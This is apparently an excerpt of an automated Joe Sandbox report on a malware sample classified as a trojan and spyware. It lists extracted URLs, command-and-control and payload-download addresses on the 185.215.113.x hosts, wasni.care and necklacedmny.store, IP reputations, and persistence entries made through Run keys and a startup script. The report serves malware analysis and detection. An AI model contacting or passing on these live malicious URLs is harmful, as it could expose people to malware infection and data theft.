                                                                                                                  https://github.com/mozilla-services/screenshotsfirefox.exe, 00000020.00000003.2668435370.00000253EC21F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668905912.00000253EC25A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668690950.00000253EC23C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://mozilla.org/#/properties/referenceBranchfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://185.215.113.43/Zu7JuNko/index.php95d7skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        http://mozilla.org/#/properties/outcomes/itemsfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          http://mozilla.org/#/properties/quickSuggestSponsoredIndexfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingfirefox.exe, 00000020.00000002.2983601021.00000253E872C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://stackoverflow.com/q/14436606/23354Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, Fwkdsz.exe, 00000007.00000002.2640122155.0000000002CF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://185.215.113.206/6c4adf523b719729.php2o0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://exslt.org/commonfirefox.exe, 00000020.00000002.2970521081.00000253E7E8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://ok.ru/firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta24da741fb6.exe, 0000000B.00000003.2564360640.0000000005977000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://mozilla.org/#/properties/csvImportfirefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://185.215.113.206/746f34465cf17784/vcruntime140.dllvbnData0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestionsfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://mozilla.org/#/properties/branches/anyOf/0/items/properties/featurefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.ecosia.org/newtab/24da741fb6.exe, 0000000B.00000003.2528657418.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528779080.000000000598A000.00000004.00000800.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2528529918.00000000059A0000.00000004.00000800.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000003.2825724774.0000000001692000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://MD8.mozilla.org/1/mfirefox.exe, 00000020.00000003.2812464285.00000253F49B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2877164435.00000253F49B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabledfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152firefox.exe, 00000020.00000002.3230698047.00000253EBC44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://shavar.services.mozilla.com/firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://185.215.113.16/off/def.exe24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001171000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://spocs.getpocket.com/firefox.exe, 00000020.00000002.2983601021.00000253E87EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3039067692.00000253E942B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2884153672.00000253F03F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://www.iqiyi.com/firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://mozilla.org/#/properties/endDatefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://monitor.firefox.comremoveTabsProgressListenerbrowser.tabs.drawInTitlebartestPermissionFromPrfirefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    http://mozilla.org/#/properties/addonsFeatureGatefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://185.215.113.206/746f34465cf17784/nss3.dllata0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        http://mozilla.org/#/properties/addonsShowLessFrequentlyCapfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabledfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdhttp://mozilla.org/#/propertfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://bugzilla.mozilla.org/show_bug.cgi?id=1584464firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://mozilla.org/#/properties/proposedDurationresource://passwordmgr/passwordstorage.sys.mjsGettinfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://docs.rs/getrandom#nodejs-es-module-support0d8313073f.exe, 0000000D.00000003.2559813189.000000000533B000.00000004.00001000.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2983236159.000000006C191000.00000002.00000001.01000000.0000001A.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000063C000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://account.bellmedia.cfirefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                unknown
                                                                                                                                                                http://mozilla.org/#/properties/enrollmentEndDatefirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://login.microsoftonline.comfirefox.exe, 00000020.00000003.2885495011.00000253EF97C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.zhihu.com/firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://x1.c.lencr.org/024da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2883030561.00000253F44B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://x1.i.lencr.org/024da741fb6.exe, 0000000B.00000003.2560153285.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2883030561.00000253F44B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://mozilla-hub.atlassian.net/browse/SDK-405firefox.exe, 00000020.00000002.3003403643.00000253E8803000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://185.215.113.206/746f34465cf17784/freebl3.dlladf523b719729.php0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://mozilla.org/#/properties/outcomesfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://support.mozilla.org/products/firefoxgro.all24da741fb6.exe, 0000000B.00000003.2562607971.0000000005A8B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2firefox.exe, 00000020.00000003.2884647850.00000253EF99E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3341541081.00000253EF99E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000020.00000002.2981301005.00000253E847D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3199771193.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2782741908.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2905590480.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3144688592.00000253EA2DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2870938459.00000253EBA34000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2671242763.00000253EBA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2860366691.00000253EBA39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000020.00000002.3309604059.00000253ECC23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://screenshots.firefox.com/firefox.exe, 00000020.00000003.2669234122.00000253EC277000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2668191749.00000253EC000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3003403643.00000253E8872000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://185.215.113.206/746f34465cf17784/msvcp140.dll_s.0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://gpuweb.github.io/gpuweb/firefox.exe, 00000020.00000003.2896479331.00000253F4452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3322305671.00000253EDF17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://firefox-source-docs.mozilla.org/remote/Security.htmlfirefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/adfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://json-schema.org/draft-07/schema#-firefox.exe, 00000020.00000003.2899526882.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3320063127.00000253ED7C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://vk.com/firefox.exe, 00000020.00000002.3328096517.00000253EE4F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratiofirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2firefox.exe, 00000020.00000002.2983601021.00000253E8710000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://necklacedmny.store/24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2685688622.00000000011B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/google/closure-compiler/issues/3177firefox.exe, 00000020.00000003.2821737659.00000253F4544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2748840225.00000253F4548000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2744719723.00000253F454B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialogfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://wasni.care/panel/uploads/Fwkdsz.exe)skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://stackoverflow.com/q/2152978/23354Fwkdsz.exe, 00000007.00000002.2703552750.0000000006A60000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://mozilla.org/#/properties/appIdfirefox.exe, 00000020.00000002.3322305671.00000253EDF5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://www.google.com/complete/firefox.exe, 00000020.00000003.2757294999.00000253EE9D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://185.215.113.206/746f34465cf17784/ware0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.tsfirefox.exe, 00000020.00000003.2789703011.00000253F4531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2820751925.00000253F4533000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2754762057.00000253F452D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2749775963.00000253F452B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      185.215.113.43
                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                      208.109.77.116
                                                                                                                                                                                                      wasni.careUnited States
                                                                                                                                                                                                      30148SUCURI-SECUSfalse
                                                                                                                                                                                                      216.58.212.164
                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                      185.215.113.16
                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                      34.107.221.82
                                                                                                                                                                                                      prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                      35.244.181.201
                                                                                                                                                                                                      prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                      34.117.188.166
                                                                                                                                                                                                      contile.services.mozilla.comUnited States
                                                                                                                                                                                                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                      188.114.96.3
                                                                                                                                                                                                      necklacedmny.storeEuropean Union
                                                                                                                                                                                                      13335CLOUDFLARENETUStrue
                                                                                                                                                                                                      185.215.113.206
                                                                                                                                                                                                      unknownPortugal
                                                                                                                                                                                                      206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                      142.250.186.110
                                                                                                                                                                                                      youtube.comUnited States
                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                      35.190.72.216
                                                                                                                                                                                                      prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                      34.160.144.191
                                                                                                                                                                                                      prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                      2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                      IP
                                                                                                                                                                                                      192.168.2.4
                                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1547313
                                                                                                                                                                                                      Start date and time:2024-11-02 07:14:04 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 12m 56s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:40
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:file.exe
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal100.troj.spyw.expl.evad.winEXE@69/56@31/15
                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                      • Successful, ratio: 14.3%
                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 199.232.210.172, 192.229.221.95, 13.95.31.18, 20.3.187.198, 20.242.39.171, 20.12.23.50, 20.109.210.53, 184.28.90.27, 216.58.212.131, 142.250.181.238, 74.125.71.84, 34.104.35.123, 35.160.212.113, 52.11.191.138, 54.185.230.140
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, aus5.mozilla.org, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, clients2.google.com, ocsp.digicert.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, detectportal.prod.mozaws.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com, location.services.mozilla.com
                                                                                                                                                                                                      • Execution Graph export aborted for target 24da741fb6.exe, PID 1236 because there are no executed function
                                                                                                                                                                                                      • Execution Graph export aborted for target Fwkdsz.exe, PID 1748 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target file.exe, PID 6780 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1720 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target skotes.exe, PID 3220 because there are no executed function
                                                                                                                                                                                                      • Execution Graph export aborted for target skotes.exe, PID 4192 because there are no executed function
                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      02:16:01API Interceptor925x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                      02:16:09API Interceptor19x Sleep call for process: Fwkdsz.exe modified
                                                                                                                                                                                                      02:16:13API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                      02:16:17API Interceptor20x Sleep call for process: 24da741fb6.exe modified
                                                                                                                                                                                                      02:16:34API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                      02:16:55API Interceptor24x Sleep call for process: 0d8313073f.exe modified
                                                                                                                                                                                                      06:14:56Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                      06:16:19AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs
                                                                                                                                                                                                      06:16:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 24da741fb6.exe C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe
                                                                                                                                                                                                      06:16:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0d8313073f.exe C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                      06:17:14AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 203f60e481.exe C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe
                                                                                                                                                                                                      06:17:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 8a0ff7e068.exe C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      185.215.113.43file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                      • 185.215.113.43/Zu7JuNko/index.php
